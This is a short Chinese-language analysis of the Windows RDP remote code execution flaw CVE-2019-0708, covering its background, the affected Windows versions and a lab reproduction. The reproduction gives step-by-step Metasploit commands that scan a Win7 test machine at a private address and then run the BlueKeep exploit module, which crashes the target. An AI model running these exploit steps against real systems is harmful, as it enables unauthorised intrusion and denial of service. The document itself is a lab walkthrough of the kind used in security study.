Windows RDP 服务高危漏洞分析 （CVE-2019-0708）

1. 背景

2019 年 5 月 14 日微软官方发布紧急安全补丁，修复了 Windows 远程桌面服务的远程代码执行高危漏洞 CVE-2019-0708（CNVD-2019-14264、CNNVD-201905-434），该漏洞影响了某些旧版本的 Windows 系统。由于该漏洞无需身份验证且无需用户交互，所以这个漏洞可以通过网络蠕虫的方式被利用，利用此漏洞的恶意软件可以从被感染的计算机传播到网络中其他易受攻击的计算机，传播方式与 2017 年 WannaCry 恶意软件的传播方式类似。

2. 影响范围

· Windows 7

· Windows Server 2008

· Windows Server 2008 R2

· Windows 2003

· Windows XP

漏洞复现：此漏洞已经上传到metasploit

实验准备:kali 192.168.1.180

Win7 192.168.1.133

1. 命令行输入msfconsole后，查找模块

Search 0708

2. 使用分析模块

Use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

Show options

Set RHOSTS 192.168.1.133（靶机ip）

3. 设置攻击模块

Use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Show options

Set RHOSTS 192.168.1.133

Run

靶机出现蓝屏，说明该漏洞被利用